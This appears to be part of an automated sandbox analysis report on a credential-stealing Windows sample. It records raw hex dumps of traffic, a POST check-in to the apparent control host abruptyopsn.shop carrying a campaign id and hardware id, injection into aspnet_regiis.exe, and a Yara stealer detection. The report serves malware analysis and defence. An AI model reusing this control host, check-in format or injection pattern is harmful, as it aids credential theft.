2024-12-31 16:40:18 UTC	15331	OUT	Data Raw: d7 71 61 43 9d ab 52 99 e5 57 f0 34 84 4c a1 1c 08 f6 12 1e 39 58 da 56 cd 7b 05 84 38 4d 73 bc 72 51 51 3e c4 dd 6d d2 25 93 97 84 8d 9a c0 60 f2 96 13 cc 9c a0 91 a0 3a 93 13 0f 28 0d 56 05 c6 e1 1e f9 b0 92 e0 e2 fb 80 49 87 79 fc 91 17 22 0d 4e 51 bf 65 8f 10 3f 24 98 db 86 79 71 de b3 4b 8b e5 5a 1e 6c 9a 97 4f 1b 4d d2 4b fe 9d 15 47 99 bb 44 5e a0 de ec dc 75 d2 90 e1 f4 a1 f6 4e aa e2 32 43 37 93 5e 22 6a 74 25 64 f6 2b b9 2e a8 58 a7 f6 a7 88 9a 4a dc 07 7b 58 17 eb e7 05 3e 62 13 9d ce 63 32 4c f5 4a f0 2e 9a f8 b5 43 47 c3 1c 8f 24 0e 91 4e 8d cd 50 a6 b5 6a c5 ea 7c df e7 dc dd 3b 20 f1 f8 0d 55 6b 9b c8 1b 51 84 d9 9b af 6b 35 10 7e 04 40 2a 63 7e 58 27 9f 41 e9 61 1b e7 9f 28 03 7a 99 39 97 8a 7c 65 14 a1 f0 68 e2 74 d4 e6 ed 00 0d b5 66 e4 Data Ascii: qaCRW4L9XV{8MsrQQ>m%`:(VIy"NQe?$yqKZlOMKGD^uN2C7^"jt%d+.XJ{X>bc2LJ.CG$NPj\|; UkQk5~@*c~X'Aa(z9\|ehtf
2024-12-31 16:40:18 UTC	15331	OUT	Data Raw: b0 98 bd 82 46 c1 a7 b8 c1 66 12 a8 a9 2b c6 af 14 b7 a1 66 fa 83 50 ac ab 87 55 6e f4 06 5f 0a a3 a5 47 15 68 b1 8f 70 37 46 83 c8 0c 7a 98 8f 1f 49 45 8d ab 05 41 84 78 95 4a b4 49 da 61 f0 70 de 29 60 eb 6d e3 0c 79 7a f2 c7 e1 35 85 97 b3 91 cb 5a e4 84 21 f4 46 4e a0 dc 60 a5 0e 14 f6 84 4b 42 49 af 69 a3 70 f7 ce 69 3f e5 ae 60 90 4b 78 02 17 fc f7 89 03 e1 7d 24 c6 50 4c b4 cc 32 51 65 8c fb 3a 14 15 1a 7e 94 11 ca d5 22 0c 33 c4 16 19 d6 47 5d af 1b 59 39 61 b6 a2 16 b0 3f cf d1 a7 58 16 09 4e 2f 03 3d cc 54 b2 67 2b 77 78 d6 fa 93 2a 57 24 a6 d4 6a cb d0 71 22 ae 0d a5 5b a2 50 9d f8 23 4a 91 60 58 b3 16 17 31 8e 1c bb c6 df d0 e3 63 7f 05 6f 60 e5 3c 64 e1 84 d8 18 16 ff c8 f0 23 27 e1 10 86 58 8b d9 c4 9e 7b 6b f6 8a e1 c1 47 f6 2c de 90 9b c8 Data Ascii: Ff+fPUn_Ghp7FzIEAxJIap)`myz5Z!FN`KBIipi?`Kx}$PL2Qe:~"3G]Y9a?XN/=Tg+wx*W$jq"[P#J`X1co`<d#'X{kG,
2024-12-31 16:40:18 UTC	15331	OUT	Data Raw: a0 86 c0 bd ad 8d 15 31 ba ec ba 81 0c bc af 2c dc f7 64 82 3f b1 1c 3f 74 7d 67 f7 65 ca a9 4d 25 4f c0 e1 78 03 a5 4a 01 26 9a 20 ef cb 86 05 07 3c e6 b8 31 7d 0d f7 48 3e 65 f0 a8 c1 b9 9c d8 f4 73 c3 ac db 6f 91 ce 32 85 c7 1a 0a 21 c1 f2 a8 95 fb db c9 c9 51 e5 21 fd c4 a2 2f b5 af 59 d6 53 37 9b 52 dc d4 f9 e9 f9 91 57 c2 52 0e c6 f4 2d 1b b7 2c 7e 41 fe 1d a4 3b 36 ab 47 0f 62 89 0e 62 c2 28 32 cc b8 31 97 a6 5e 2e f2 5d c7 8d f8 f6 36 8f 09 d0 35 aa b9 be 07 88 6d 40 27 16 ee fc 6d b6 cc 18 38 2f 7a 7d 73 95 61 b9 ac a8 27 6a 67 97 4d cc 12 01 2b aa 44 2f af 31 89 1f 95 75 ed 81 b3 10 5c f5 38 c9 92 ac de 23 70 7f 04 1a fb 8d 80 6d f4 6b d9 c6 8c 3d 40 30 cb b4 1b 11 9f 2e ce 73 92 2c 39 25 8f 7f 16 a9 69 88 5f d0 87 eb 97 f8 c0 97 c8 82 8a 3b 70 Data Ascii: 1,d??t}geM%OxJ& <1}H>eso2!Q!/YS7RWR-,~A;6Gbb(21^.]65m@'m8/z}sa'jgM+D/1u\8#pmk=@0.s,9%i_;p
2024-12-31 16:40:18 UTC	15331	OUT	Data Raw: 54 1f 8e 81 cd 42 83 3a 88 74 92 ea c1 b1 00 c9 23 44 e4 8d e2 02 8e 92 e5 48 f6 5d 24 57 be fc ac eb 3f 32 ea d0 39 df 6c 8d 42 84 b1 c7 16 72 97 94 31 a0 78 ce 10 22 d0 d3 b5 98 e6 14 14 62 f3 e7 24 70 de 93 e2 56 e3 83 be 6a e6 b4 18 ad 26 e4 1a 00 a2 9f 50 cd 9c 98 f1 de a0 5e 91 36 bd 59 1f 44 a4 11 69 7a 4a 5b 34 7e 77 92 24 ef 4d 1f 0d 0d 94 7f e5 5e 88 c8 ae 7e 10 2e 95 c3 42 f2 35 71 cc 15 1d eb c5 10 ef a7 cb c6 78 27 47 e8 c3 7c af 16 f2 3d 07 38 3d 45 70 a8 0f 4a cf 9f d0 69 e5 79 78 25 2c f3 f4 1e 36 10 08 e6 e2 78 37 6b 6a 15 81 e4 11 2a 95 cd 4c af 40 cc df 5f 85 be 89 c5 f5 87 fa 82 17 7d 73 67 3a 9a 5c d0 a1 3d bb c9 eb 8d c7 70 65 0c 57 85 c2 c6 90 7e 6c 9c ee 27 d9 d4 30 19 80 98 ae e5 3c dd 81 49 1e e5 63 ce a2 96 ea 83 c3 88 8d e1 b7 Data Ascii: TB:t#DH]$W?29lBr1x"b$pVj&P^6YDizJ[4~w$M^~.B5qx'G\|=8=EpJiyx%,6x7kj*L@_}sg:\=peW~l'0<Ic
2024-12-31 16:40:18 UTC	15331	OUT	Data Raw: 35 1a 5f 72 66 8c 92 02 79 8f 8e 14 88 85 5c 86 62 6a ab 6f 9c b3 40 d0 d2 16 c2 cb 50 48 74 9d fd d6 c5 f1 54 ec e6 3e 54 ae 2a 39 66 ca ef 81 9f 19 88 f1 b1 18 80 63 d7 4f 62 90 da d8 23 ad 7c be 7a e5 8e 3e 2b dc 52 3d cc e0 00 10 9e 7f bb d5 5d 6b 54 5b 93 21 c1 d9 0e 5e 4c 09 14 22 d8 e4 ae d1 7b 46 f8 3d 67 1e 4f f8 16 71 f6 8a 59 72 eb 83 3b e4 e5 dd 8e b0 a6 40 59 77 9c 74 80 b5 c7 72 83 a0 7a 1b 8a ec 20 81 62 ba 8b c2 94 30 7f ec 26 7a 75 44 e3 53 78 de e8 cc c5 42 77 28 c3 d9 53 59 c2 13 a6 b9 ca cd 98 f7 44 7f 52 73 ab 8e 08 89 e1 ec 53 88 f5 8b 41 f2 64 8d 91 04 9f 0d bb c1 9a 67 02 a9 7f dc 07 e8 b1 a0 ee 4f 96 2a 83 f8 35 2e de 20 cc a0 8c 1d 20 d7 ca 92 3e e1 62 62 10 82 cb 4c f7 c3 4d 0e b2 d8 e3 cb a7 3e e1 20 c0 3f eb ed fe 59 3e 7b e3 Data Ascii: 5_rfy\bjo@PHtT>T9fcOb#\|z>+R=]kT[!^L"{F=gOqYr;@Ywtrz b0&zuDSxBw(SYDRsSAdgO5. >bbLM> ?Y>{
2024-12-31 16:40:20 UTC	1131	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:40:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vsd2qkq5ghcf7m230m901aketm; expires=Sat, 26 Apr 2025 10:26:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=24l2NTcxtAJuNbahoqtggIn4%2B4HFIvEXpQp%2FVRppZHNgcCc15Zz2eQxFWjpOI9WInch2zoeq7WgCYQPT0XBAjWSH1BI%2BT0TVmLOi0SfSL2WKHT4FjQClbonRgPr9%2B7TO7h2X"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fabb5e9ff61de9a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1583&rtt_var=603&sent=202&recv=588&lost=0&retrans=0&sent_bytes=3052&recv_bytes=573182&delivery_rate=2698706&cwnd=210&unsent_bytes=0&cid=1b500dac2ebdeb7d&ts=2692&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49994	104.21.96.1	443	4512	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:40:21 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 89 Host: abruptyopsn.shop
2024-12-31 16:40:21 UTC	89	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 77 63 79 6a 73 6b 61 6a 65 6e 61 6f 26 6a 3d 26 68 77 69 64 3d 33 37 44 37 45 32 36 34 30 46 39 34 34 44 41 33 37 32 36 37 31 45 34 34 44 38 34 32 30 32 39 41 Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--wcyjskajenao&j=&hwid=37D7E2640F944DA372671E44D842029A
2024-12-31 16:40:21 UTC	1127	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:40:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ni6e9n5gp87goklebkmf8k0qe3; expires=Sat, 26 Apr 2025 10:27:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e8%2BQivjwdhOuVJk1K6DZJtzQClZ3pdwZPSje83wL7df%2FK7awL0MsfXMbSBZiUridpfWHIfoepvTFRl%2BLkvKC6aIm7JXLaFyhdnWvq%2FTkEaJontnIZkMrWEhgV%2FhrISOQoN%2Ft"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fabb5fdde501a48-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1937&min_rtt=1928&rtt_var=742&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3052&recv_bytes=989&delivery_rate=2185628&cwnd=158&unsent_bytes=0&cid=b80b3dd1ef8f3f6f&ts=459&x=0"
2024-12-31 16:40:21 UTC	242	IN	Data Raw: 33 36 61 30 0d 0a 33 34 61 4a 4d 45 31 62 73 47 7a 43 33 2b 77 35 56 71 64 56 37 49 6e 73 31 41 44 32 64 31 38 59 46 4e 67 4d 48 67 66 58 73 68 75 45 2f 61 74 57 4f 58 6d 4b 58 65 37 39 69 52 74 73 6c 6e 6e 4f 37 63 37 75 49 73 5a 47 43 6d 67 6e 73 6d 46 5a 66 35 7a 4b 52 2f 43 33 2b 30 41 72 46 4f 6f 50 6c 4b 75 70 64 68 7a 71 4a 36 33 67 32 4b 4a 31 70 51 64 76 4c 55 44 71 65 46 6c 6b 70 74 59 77 75 73 4b 34 65 43 67 55 2b 51 36 48 72 61 52 50 41 64 49 35 31 4c 79 41 72 46 66 47 4a 6d 74 7a 62 61 74 50 55 6d 37 38 68 31 65 78 30 75 56 67 4c 47 76 71 46 62 4c 73 31 58 63 41 37 44 48 59 76 49 53 6e 55 34 55 52 5a 6e 6b 69 67 48 5a 7a 58 35 48 51 53 5a 76 76 33 58 73 36 45 73 55 67 39 62 53 64 58 52 6e 79 62 4a 33 35 Data Ascii: 36a034aJME1bsGzC3+w5VqdV7Ins1AD2d18YFNgMHgfXshuE/atWOXmKXe79iRtslnnO7c7uIsZGCmgnsmFZf5zKR/C3+0ArFOoPlKupdhzqJ63g2KJ1pQdvLUDqeFlkptYwusK4eCgU+Q6HraRPAdI51LyArFfGJmtzbatPUm78h1ex0uVgLGvqFbLs1XcA7DHYvISnU4URZnkigHZzX5HQSZvv3Xs6EsUg9bSdXRnybJ35
2024-12-31 16:40:21 UTC	1369	IN	Data Raw: 67 70 39 75 6b 45 51 4b 61 55 44 6f 53 48 56 2b 72 65 56 64 75 75 54 37 51 78 6c 69 2f 44 61 41 37 4b 39 4c 59 4f 49 6d 72 74 69 47 6a 6e 71 52 44 7a 5a 57 62 71 31 75 57 6e 36 76 68 56 69 78 34 74 78 46 65 68 7a 57 50 37 71 6f 67 42 49 4b 69 47 53 6b 73 4e 58 6d 52 5a 63 69 45 32 31 4f 6a 7a 31 50 66 5a 43 5a 4c 70 4f 31 79 67 45 64 4f 74 34 32 38 4b 76 66 45 6a 57 65 42 49 37 69 32 62 78 7a 70 51 51 35 49 58 58 75 56 43 64 71 6a 2f 51 75 69 63 2f 67 64 44 51 73 2b 52 71 4f 36 49 64 49 4d 75 49 41 31 66 75 2b 75 6b 75 59 45 57 38 6f 51 61 67 2f 64 47 71 41 79 6c 43 6e 32 71 59 42 50 79 76 57 49 35 69 38 75 6b 6b 54 36 41 2b 68 2b 36 32 39 4e 4b 59 43 44 48 64 42 37 56 67 73 63 35 44 52 61 72 76 61 70 6d 59 62 43 4e 34 4a 6a 59 61 4f 66 43 54 76 66 71 76 Data Ascii: gp9ukEQKaUDoSHV+reVduuT7Qxli/DaA7K9LYOImrtiGjnqRDzZWbq1uWn6vhVix4txFehzWP7qogBIKiGSksNXmRZciE21Ojz1PfZCZLpO1ygEdOt428KvfEjWeBI7i2bxzpQQ5IXXuVCdqj/Quic/gdDQs+RqO6IdIMuIA1fu+ukuYEW8oQag/dGqAylCn2qYBPyvWI5i8ukkT6A+h+629NKYCDHdB7Vgsc5DRarvapmYbCN4JjYaOfCTvfqv
2024-12-31 16:40:21 UTC	1369	IN	Data Raw: 70 51 6c 47 33 46 41 6b 33 74 58 63 70 75 46 63 4b 37 69 78 6d 56 30 4b 65 49 43 69 62 47 4b 43 57 66 79 4a 64 2f 6a 67 5a 4e 34 76 51 38 44 4e 79 57 71 66 48 68 49 6a 64 46 4e 71 38 50 47 65 67 41 70 38 51 58 32 71 5a 6c 71 4a 70 64 67 75 4c 75 59 6b 32 4f 48 45 77 4d 33 51 49 35 66 63 47 4b 59 36 33 6d 61 39 4d 46 73 59 67 7a 46 41 50 72 71 67 45 45 42 6c 77 54 59 34 70 57 6e 51 37 6f 65 64 43 31 66 74 6c 68 79 56 37 61 43 51 61 62 32 75 67 6b 44 44 66 73 49 39 75 71 45 53 67 58 55 4d 39 58 6f 32 6f 78 36 6d 79 38 5a 65 6b 61 63 5a 55 70 4d 6f 50 74 75 6b 37 48 69 51 53 6b 55 35 56 57 77 6a 59 4a 79 4f 4d 46 6c 33 64 79 63 35 32 71 62 4d 43 64 54 62 49 51 6a 4c 33 57 6e 31 46 53 46 35 64 39 45 43 42 54 36 49 62 43 65 68 51 30 67 30 67 61 63 75 64 6d 41 Data Ascii: pQlG3FAk3tXcpuFcK7ixmV0KeICibGKCWfyJd/jgZN4vQ8DNyWqfHhIjdFNq8PGegAp8QX2qZlqJpdguLuYk2OHEwM3QI5fcGKY63ma9MFsYgzFAPrqgEEBlwTY4pWnQ7oedC1ftlhyV7aCQab2ugkDDfsI9uqESgXUM9Xo2ox6my8ZekacZUpMoPtuk7HiQSkU5VWwjYJyOMFl3dyc52qbMCdTbIQjL3Wn1FSF5d9ECBT6IbCehQ0g0gacudmA
2024-12-31 16:40:21 UTC	1369	IN	Data Raw: 46 63 63 75 46 74 4b 46 4b 65 68 79 4f 38 2f 4f 77 45 4f 68 2b 41 58 4c 76 30 6f 41 34 39 7a 67 61 57 77 61 66 73 55 37 41 67 46 69 70 7a 6b 33 35 4a 54 6f 62 2b 59 75 76 4e 34 77 41 71 4b 34 55 30 6c 75 69 48 57 42 66 51 5a 4e 2f 2f 73 50 74 49 6a 78 59 6d 66 30 61 41 50 45 78 6b 67 50 31 42 74 64 44 67 63 69 67 64 2b 6a 61 61 36 59 74 73 62 74 4d 37 72 74 79 48 34 6b 53 78 46 68 56 43 4a 65 74 4e 57 6d 2b 61 69 32 33 72 76 38 74 7a 64 53 6a 52 47 36 37 73 68 55 77 38 38 69 57 6e 7a 34 4f 56 4d 73 41 52 4c 43 35 2b 68 43 4e 36 66 35 48 64 56 6f 62 6e 33 33 45 37 45 4f 63 65 68 4a 61 6a 64 6d 65 53 4e 34 44 6b 6c 4b 5a 47 6e 53 59 65 59 56 57 56 57 56 56 77 72 59 4a 35 71 2b 6e 47 58 41 49 61 30 6a 6d 52 75 4a 52 55 50 38 49 34 75 63 62 5a 6d 58 47 30 4d Data Ascii: FccuFtKFKehyO8/OwEOh+AXLv0oA49zgaWwafsU7AgFipzk35JTob+YuvN4wAqK4U0luiHWBfQZN//sPtIjxYmf0aAPExkgP1BtdDgcigd+jaa6YtsbtM7rtyH4kSxFhVCJetNWm+ai23rv8tzdSjRG67shUw88iWnz4OVMsARLC5+hCN6f5HdVobn33E7EOcehJajdmeSN4DklKZGnSYeYVWVWVVwrYJ5q+nGXAIa0jmRuJRUP8I4ucbZmXG0M
2024-12-31 16:40:21 UTC	1369	IN	Data Raw: 69 5a 56 6c 4c 76 6f 70 34 6b 38 50 63 47 79 70 6f 34 43 4c 32 6e 4c 35 33 4e 50 55 42 32 37 32 57 68 30 6d 62 47 6a 46 73 5a 59 68 45 64 32 4f 50 2f 53 6d 55 36 4f 38 44 41 68 4c 43 47 59 36 6e 71 30 41 76 7a 6d 50 64 76 70 79 79 64 5a 6f 69 42 31 64 48 71 7a 35 72 4e 4c 4c 61 56 37 76 77 75 58 6f 42 46 66 70 64 6d 4a 57 48 63 6a 36 51 42 39 37 4f 31 62 78 7a 76 6a 6b 58 51 55 4c 7a 65 31 46 6d 74 4e 68 32 6d 64 7a 6f 65 69 38 66 31 44 79 56 6c 34 73 41 47 4d 4d 4a 77 39 69 2b 6a 55 75 58 4c 53 35 53 4a 2b 42 43 66 32 57 56 36 79 6d 53 34 4e 46 37 5a 6a 4c 30 50 50 54 6f 6c 48 51 52 7a 52 53 30 37 72 69 66 64 34 52 42 47 46 42 54 38 30 4a 76 55 4f 58 7a 51 34 61 33 30 46 63 73 4e 73 63 63 38 62 57 48 44 41 62 68 47 71 33 43 76 59 64 77 6a 68 6f 31 61 55 Data Ascii: iZVlLvop4k8PcGypo4CL2nL53NPUB272Wh0mbGjFsZYhEd2OP/SmU6O8DAhLCGY6nq0AvzmPdvpyydZoiB1dHqz5rNLLaV7vwuXoBFfpdmJWHcj6QB97O1bxzvjkXQULze1FmtNh2mdzoei8f1DyVl4sAGMMJw9i+jUuXLS5SJ+BCf2WV6ymS4NF7ZjL0PPTolHQRzRS07rifd4RBGFBT80JvUOXzQ4a30FcsNscc8bWHDAbhGq3CvYdwjho1aU
2024-12-31 16:40:21 UTC	1369	IN	Data Raw: 62 34 2f 37 57 4b 58 52 76 33 55 4b 4c 4e 59 48 70 6f 6d 32 58 54 32 54 49 49 2f 74 67 2b 4a 6e 6d 30 34 37 61 79 57 49 66 58 68 62 2b 4d 68 30 72 75 4c 73 66 69 6b 44 2f 31 36 4a 73 59 70 4e 4d 76 30 44 31 64 32 5a 6b 31 4f 56 4d 57 5a 33 4a 49 51 6a 66 58 2b 61 2f 48 4f 78 33 73 4e 36 47 78 58 71 4b 61 71 56 33 67 45 6e 34 52 32 30 75 35 69 54 59 34 63 54 64 43 6b 6c 74 46 52 48 5a 59 37 6f 55 65 6a 4f 75 31 6f 5a 59 76 6c 64 74 34 71 30 55 78 50 4b 45 74 6a 39 76 35 68 70 6b 7a 45 2b 61 6c 4f 76 54 31 4e 49 68 76 78 4a 6c 73 58 7a 5a 33 6f 2f 2b 31 53 51 72 4a 39 59 4e 66 74 36 70 63 69 30 76 6d 32 75 4d 54 31 72 58 49 39 41 61 32 79 56 78 79 6e 30 35 2b 41 47 66 79 37 42 47 37 53 47 33 57 4d 31 34 69 53 5a 37 71 71 67 52 49 63 34 4d 31 64 56 67 47 6c Data Ascii: b4/7WKXRv3UKLNYHpom2XT2TII/tg+Jnm047ayWIfXhb+Mh0ruLsfikD/16JsYpNMv0D1d2Zk1OVMWZ3JIQjfX+a/HOx3sN6GxXqKaqV3gEn4R20u5iTY4cTdCkltFRHZY7oUejOu1oZYvldt4q0UxPKEtj9v5hpkzE+alOvT1NIhvxJlsXzZ3o/+1SQrJ9YNft6pci0vm2uMT1rXI9Aa2yVxyn05+AGfy7BG7SG3WM14iSZ7qqgRIc4M1dVgGl
2024-12-31 16:40:21 UTC	1369	IN	Data Raw: 48 6d 47 76 38 70 6f 4e 51 2f 2b 4c 61 48 76 73 42 59 35 31 42 47 4e 36 4e 75 37 51 70 34 52 61 31 4e 66 6d 32 39 54 62 50 7a 71 59 62 4c 65 7a 31 49 63 4e 2f 4d 66 74 35 75 36 54 7a 79 58 48 34 6e 6c 6f 65 52 43 6a 43 4e 30 63 57 4f 50 66 47 78 78 6c 6f 4e 78 74 73 48 78 66 54 30 73 79 54 6a 33 75 61 4e 6a 4e 66 45 68 6f 62 36 6b 73 47 72 48 54 32 74 64 55 36 4a 38 4c 6a 4b 44 2f 33 2b 32 30 76 31 45 64 41 72 63 42 62 65 4b 75 46 6f 73 36 78 4c 63 32 34 37 6c 57 72 51 52 47 56 64 39 34 55 46 4a 59 6f 75 64 4b 4f 71 30 7a 46 55 4b 63 49 6b 38 6c 34 57 32 64 53 4c 2f 4d 62 43 6d 33 5a 64 78 72 41 59 70 63 58 61 38 50 31 56 6b 6d 74 6b 77 68 2f 7a 6b 61 41 73 35 35 43 32 6d 73 39 74 38 48 66 41 51 31 4d 32 50 6e 45 36 45 4f 68 78 79 54 4b 73 31 54 6c 4b 63 Data Ascii: HmGv8poNQ/+LaHvsBY51BGN6Nu7Qp4Ra1Nfm29TbPzqYbLez1IcN/Mft5u6TzyXH4nloeRCjCN0cWOPfGxxloNxtsHxfT0syTj3uaNjNfEhob6ksGrHT2tdU6J8LjKD/3+20v1EdArcBbeKuFos6xLc247lWrQRGVd94UFJYoudKOq0zFUKcIk8l4W2dSL/MbCm3ZdxrAYpcXa8P1Vkmtkwh/zkaAs55C2ms9t8HfAQ1M2PnE6EOhxyTKs1TlKc
2024-12-31 16:40:21 UTC	1369	IN	Data Raw: 71 6d 64 6e 74 72 78 51 57 6d 6d 35 68 66 41 50 51 37 75 4f 57 69 6a 44 47 73 50 41 35 63 4c 61 4a 59 64 58 50 6a 68 33 4f 30 77 4f 56 54 43 78 4b 42 4e 4b 69 79 74 46 51 63 7a 78 75 55 78 59 4c 6b 51 6f 42 43 62 57 70 6c 34 45 34 75 52 49 66 6b 63 4b 62 31 2f 67 42 38 44 73 42 56 6e 76 44 55 66 78 6e 56 4c 5a 76 66 71 75 46 6d 75 53 30 38 63 33 62 67 54 6d 6c 4f 70 50 74 2f 76 76 7a 4d 55 69 38 57 67 68 75 4a 73 34 52 38 44 73 41 7a 68 65 65 70 2f 7a 53 75 58 42 78 78 63 37 5a 49 56 46 65 37 69 69 36 7a 2f 74 34 41 47 52 48 63 58 72 53 37 76 45 31 67 30 7a 53 44 2f 39 57 56 59 72 38 57 43 58 42 6c 73 6e 52 74 4c 4b 50 31 49 71 7a 31 33 6b 4d 72 61 6f 6b 65 73 37 6d 46 57 78 48 4e 45 62 6e 67 75 4a 39 33 68 77 34 6e 4c 48 43 65 65 6c 5a 6f 72 6f 4a 52 6d Data Ascii: qmdntrxQWmm5hfAPQ7uOWijDGsPA5cLaJYdXPjh3O0wOVTCxKBNKiytFQczxuUxYLkQoBCbWpl4E4uRIfkcKb1/gB8DsBVnvDUfxnVLZvfquFmuS08c3bgTmlOpPt/vvzMUi8WghuJs4R8DsAzheep/zSuXBxxc7ZIVFe7ii6z/t4AGRHcXrS7vE1g0zSD/9WVYr8WCXBlsnRtLKP1Iqz13kMraokes7mFWxHNEbnguJ93hw4nLHCeelZoroJRm
2024-12-31 16:40:21 UTC	1369	IN	Data Raw: 76 49 73 49 74 6d 6f 6a 63 66 32 2f 30 4f 5a 54 65 33 4a 67 30 6d 6a 41 73 58 56 79 78 64 57 35 4c 67 4f 5a 79 68 2b 65 39 51 44 51 34 67 30 65 79 69 62 52 64 59 75 77 39 6e 64 36 66 6e 48 53 55 50 41 63 6f 50 34 42 75 66 46 61 38 32 30 32 59 38 64 78 56 42 6a 6a 62 48 49 43 51 6f 33 63 6b 7a 44 75 68 34 34 71 6b 62 4b 41 6a 62 48 51 2f 6e 33 34 6f 66 35 36 44 62 34 33 67 33 58 6f 75 4d 38 51 6b 6a 5a 57 2b 44 68 54 32 59 5a 7a 65 76 36 4d 77 77 68 35 74 62 56 75 37 50 48 6f 73 76 75 52 4f 75 65 50 61 61 53 38 65 36 42 57 77 74 49 64 55 4d 76 63 61 6e 64 69 75 6b 45 4b 31 46 52 6c 5a 55 6f 38 36 63 32 32 64 33 31 4c 6f 37 4c 73 43 66 6d 6a 6e 47 4f 6d 33 69 45 68 6c 31 54 53 69 34 49 75 4d 55 49 77 37 4e 6d 42 67 6e 46 31 43 4b 49 44 37 62 34 4f 70 34 30 Data Ascii: vIsItmojcf2/0OZTe3Jg0mjAsXVyxdW5LgOZyh+e9QDQ4g0eyibRdYuw9nd6fnHSUPAcoP4BufFa8202Y8dxVBjjbHICQo3ckzDuh44qkbKAjbHQ/n34of56Db43g3XouM8QkjZW+DhT2YZzev6Mwwh5tbVu7PHosvuROuePaaS8e6BWwtIdUMvcandiukEK1FRlZUo86c22d31Lo7LsCfmjnGOm3iEhl1TSi4IuMUIw7NmBgnF1CKID7b4Op40

Target ID:	0
Start time:	11:39:12
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\PASS-1234.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PASS-1234.exe"
Imagebase:	0xb90000
File size:	761'856 bytes
MD5 hash:	CF15F3E3576D512CF0696D4035212451
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:39:12
Start date:	31/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	11:39:13
Start date:	31/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Imagebase:	0x840000
File size:	43'016 bytes
MD5 hash:	5D1D74198D75640E889F0A577BBF31FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2773711720.000000000345D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2725007769.000000000345D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2773902054.000000000345D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	11:39:13
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 1224
Imagebase:	0xe20000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	14.2%
Total number of Nodes:	684
Total number of Limit Nodes:	23

Executed Functions

Function 6D387E40 Relevance: 101.6, APIs: 29, Strings: 25, Instructions: 7068nativethreadmemoryCOMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNELBASE(?,?,?), ref: 6D3899B4
ShowWindow.USER32 ref: 6D3899CA
VirtualAlloc.KERNELBASE ref: 6D389DBA
CreateProcessW.KERNELBASE ref: 6D38A3CC
